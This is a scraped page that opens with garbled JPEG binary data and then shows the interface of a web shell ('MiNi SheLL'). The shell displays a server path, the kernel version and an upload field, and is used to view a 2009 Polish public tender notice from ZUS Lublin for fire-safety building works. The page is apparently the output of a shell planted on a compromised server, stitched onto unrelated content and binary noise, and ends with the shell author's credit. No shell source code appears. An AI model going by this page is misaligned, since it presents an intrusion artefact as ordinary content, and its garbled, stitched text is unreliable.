JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/74548-N-2009.html

<p class="kh_header"><b>Lublin: Roboty budowlano- instalacyjne  w budynku przy ul. T. Zana 38 C w Lublinie</b><br>
<b>Numer ogłoszenia: 74548 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlano- instalacyjne  w budynku przy ul. T. Zana 38 C w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia, o wartości szacunkowej poniżej 5 150 000 euro,  są roboty budowlano-instalacyjne w użytkowanym budynku wysokim przy ulicy T. Zana 38 C w Lublinie oraz w budynku technicznym hydroforni, mające na celu przystosowanie ww. obiektów do aktualnych wymogów bezpieczeństwa przeciwpożarowego, zawartych w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 roku - w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów[Dz.U. Nr 80, poz. 563 z 2006 r].
2. Zakres i warunki realizacji przedmiotu zamówienia określone są w niżej wymienionych dokumentach, które obejmują wykonanie robót  w budynku biurowym przy ul. T. Zana 38C oraz w budynku technicznym przy ul. T. Zana 38A :
 2.1. Projekcie budowlano-wykonawczym instalacji hydrantowej dostosowanej do aktualnie obowiązujących przepisów w budynku biurowym przy ul. T. Zana 38 C,
2.2. Projekcie budowlano-wykonawczym instalacji elektrycznych dla potrzeb instalacji hydrantowej dostosowanej do aktualnie obowiązujących przepisów w budynku biurowym przy ul. T. Zana 38 C,
2.3. Specyfikacji technicznej wykonania i odbioru robót Nr 45000000-7.1 Wymagania ogólne,
2.4. Szczegółowych Specyfikacjach Technicznych Wykonania i Odbioru Robót : 
  Nr 45343000-3.1 - Roboty instalacyjne przeciwpożarowe, Nr 43515100-9.1 - instalacyjne roboty elektrotechniczne.
 2.5.   Przedmiarze robót Nr 1  - instalacje sanitarne,
2.6.   Przedmiarze robót Nr 2  - instalacje elektryczne.
3. Wszelkie użyte w dokumentacji projektowej, jak i w innych dokumentach przetargowych znaki towarowe, patenty, nazwy produktów oraz firm mają na celu wyłącznie określenie parametrów technicznych i jakościowych urządzeń  i materiałów, wymaganych przez Zamawiającego do realizacji zadania. Wykonawca może zaoferować produkty równoważne z tym, że obowiązkiem Wykonawcy jest wykazanie, iż oferowane przez niego produkty mają parametry techniczne   i jakościowe co najmniej takie same, jaki produkty wymienione w dokumentacji przetargowej. Ciężar wykazania równoważności oferowanych produktów spoczywa na Wykonawcy, który musi przedstawić dowody potwierdzające równoważność w postaci kompletnych (wraz z załącznikami) aprobat technicznych i kart technicznych urządzeń i bezwzględnie dołączyć je do oferty.                             
4. Wspólny Słownik Zamówień (kody CPV): 45343000-3 - Roboty instalacyjne przeciwpożarowe, Nr 43515100-9 - instalacyjne roboty   elektrotechniczne
5.Roboty wykonywane będą na podstawie prawomocnej decyzji nr 133/283  z dnia 13.03.2009r., zatwierdzającej projekt budowy ( znak. ABU.PB.I.6.7353-314/09 ) wydanej przez Prezydenta Miasta Lublina.
6. Zamawiający zastrzega, że z uwagi na specyfikę przedmiotu zamówienia,  nie może być ono realizowane przy udziale podwykonawców w zakresie instalacji sanitarnych. Wykonywanie robót przy udziale podwykonawców w pozostałym zakresie nie zwalnia Wykonawcy  z odpowiedzialności za należyte wykonanie przedmiotu zamówienia. Wykonawca odpowiada za działanie i zaniechania podwykonawcy jak za własne.  W przypadku powierzenia robót podwykonawcy Wykonawca zobowiązany jest do koordynacji robót.
7.Prace wykonywane będą w obiekcie czynnym i Wykonawca będzie zobowiązany zorganizować je tak, aby nie narażać pracowników Zamawiającego  na niebezpieczeństwo i uciążliwości wynikające  z prowadzonych robót.                  Przed przystąpieniem do robót Wykonawca i Zamawiający ustalą szczegółowe  warunki bezpieczeństwa  i higieny pracy, z podziałem obowiązków w tym zakresie i na tę okoliczność sporządzą protokół w myśl Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. Dz 2003 r. Nr 169, poz. 1650).  Roboty będące przedmiotem zamówienia będą prowadzone w dni robocze, poza godzinami pracy Zamawiającego, i w dni wolne od pracy. Zamawiający dopuszcza odstępstwo od powyższej zasady w przypadku wykonywania robót nie zakłócających pracy Zamawiającego,  za zgodą branżowego Inspektora Nadzoru.
8.Roboty wykonywane będą w oparciu o harmonogram rzeczowo - finansowy , którego projekt  wybrany Wykonawca sporządzi i przedstawi do akceptacji Zamawiającemu najpóźniej w dniu przekazania frontu robót i  który  będzie stanowił załącznik do umowy.  W miarę potrzeb oraz postępu robót Wykonawca będzie zobowiązany do jego aktualizacji. Wszystkie zmiany będą wymagały akceptacji Zamawiającego.
9.Wykonawca  przekaże Zamawiającemu,  najpóźniej w dniu przekazania frontu robót , wykaz wszystkich pracowników, którzy będą realizować zamówienie , zawierający imię, nazwisko  i numer dowodu osobistego każdej z tych osób. Wykaz ten będzie aktualizowany na bieżąco przez Wykonawcę aż do zakończenia realizacji umowy.
10. Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 3 lata   licząc od daty  bezusterkowego odbioru końcowego.
11. POLSKIE NORMY:   zawarte w Specyfikacjach technicznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.34.00.00-3, 45.51.51.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium w kwocie 6 000,00  zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy, którzy:
I.  Spełniają warunki udziału w postępowaniu określone w art. 22 ust.1.  ustawy - Prawo  zamówień publicznych, zwanej dalej  ustawą,  tj.
 1.   Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień .
2. Posiadają niezbędną wiedzę i doświadczenie w przedmiocie zamówienia oraz dysponują   potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   zamówienia 
 4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego. 

Ocena spełnienia warunków udziału w postępowaniu, wymaganych od  wykonawców,  będzie przeprowadzona w oparciu o przedłożone dokumenty  i oświadczenia wg formuły spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> II.  Na potwierdzenie spełniania ww. warunków udziału w postępowaniu wykonawcy    zobowiązani są złożyć oświadczenie, że wykonawca spełnia warunki zawarte  w art. 22 ust. 1  oraz nie podlega wykluczeniu    z postępowania:
1.  Wykonawcy krajowi i zagraniczni ( z uwzględnieniem pkt.2.)
1.1.    Aktualny odpis z właściwego rejestru albo aktualne  zaświadczenie o wpisie  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2.   Aktualne zaświadczenie właściwego urzędu skarbowego potwierdzające,  że wykonawca nie zalega z opłaceniem podatków i opłat, lub zaświadczenie   o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.3.  Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłaceniem opłat oraz składek na ubezpieczenie społeczne lub zdrowotne, lub zaświadczenie o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.4.     Uprawnienia budowlane  w specjalności instalacji sanitarnych  dla kierownika robót sanitarnych oraz w specjalności instalacji elektrycznych dla kierownika robót elektrycznych a także  zaświadczenia  o wpisie na listę członków z właściwej izby samorządu zawodowego dla osób, która będą pełniły rolę kierownika robót sanitarnych i kierownika robót elektrycznych  - aktualne na dzień składania ofert. 
2.   Wykonawcy zagraniczni
   2.1.   Wykonawca zagraniczny (mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) zamiast dokumentów wskazanych                 w pkt. II.1.1. -1.3.   - składa dokument lub dokumenty, wystawione w kraju,   w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne   i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
 2.2.     Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w pkt.   II.2.1.,  wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymagana dla tych dokumentów.
 3.  Zasady udziału w postępowaniu wykonawców występujących wspólnie:
 3.1.  Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. w ramach konsorcjum,  spółki cywilnej lub porozumienia), ustanawiają  pełnomocnika do reprezentowania ich    w postępowaniu albo reprezentowania w postępowaniu i zawarciu umowy  w sprawie zamówienia publicznego  i składają jedną ofertę,
  3.2.   Wykonawcy składający ofertę wspólną, poza dokumentami wymienionymi w pkt.  II.1.1 - 1.3., które winien złożyć każdy z wykonawców składających wspólną ofertę oraz pozostałymi wymaganymi dokumentami (składanymi wspólnie)  , do oferty dołączają również pełnomocnictwo,  o którym mowa w ppkt. 3.1.   Oświadczenie, o którym mowa   w pkt. II. w zakresie  określonym w art. 22 ust. 1 pkt 1-3  ustawy składa pełnomocnik Wykonawcy, natomiast w zakresie  art. 22 ust.1 pkt 4 ustawy, składa odrębnie każdy  ze wspólników..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZUS Oddział w Lublinie, 20-601 Lublin, ul. T. Zana 38C , piętro IX. pokój  nr 914 - budynek  38C  lub otrzymać  pocztą. Cena SIWZ - 200,00 zł brutto..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 09:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IX, pok. 914-budynek  38C..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wymagany termin realizacji zamówienia  - 90 dni od daty zawarcia umowy. Zamawiający zastrzega sobie prawo do dokonania zmiany terminu wykonania zamówienia  w przypadku wystąpienia uzasadnionych przyczyn nie leżących po stronie Wykonawcy.
2.SIWZ  zamieszczona będzie na stronie internetowej  Zamawiającego:   www.zus.pl od dnia zamieszczenia  ogłoszenia w Biuletynie Zamówień Publicznych (ogłoszenie opublikowano  w BZP  w dniu  24.03.2009r. na portalu UZP )  do upływu terminu składania ofert.
3. SIWZ w wersji papierowej ,  po okazaniu się dowodem wpłaty  200,00  zł (z VAT) na konto Zamawiającego : BH  S.A. I. O/Warszawa  Nr 21 1030 1016 0000 0000 6172 2001   z dopiskiem:   opłata za SIWZ  -  NZ/20/370/138/09  można odebrać  osobiście    w siedzibie Zamawiającego, ZUS Oddział w Lublinie, 20-601 Lublin,   ul. T. Zana 38C , piętro IX. pokój    nr 914 - budynek  38C  lub otrzymać  pocztą. 
4.Pracownikami  uprawnionymi do kontaktów z wykonawcami  są: 
4.1.  Włodzimierz Koczkodaj,  piętro IX,  pok. 914 -budynek  38C, tel/fax: (0-  81) 535-77-94    w godz. 07:15 -15:15; 
4.3.  Andrzej Orzechowski,  piętro IX,  pok. 904 -budynek  38C,  tel. (0-81) 535-77-24  fax: (0-81)   535-77-27   w godz. 07:15 -15:15; 
 5.  Termin otwarcia ofert   -  dnia  16.04.2009r. o godzinie 09:30 
6.   Miejsce otwarcia ofert -  siedziba  Zamawiającego, piętro IX, pok. 914-budynek  38C

Creat By MiNi SheLL
Email: jattceo@gmail.com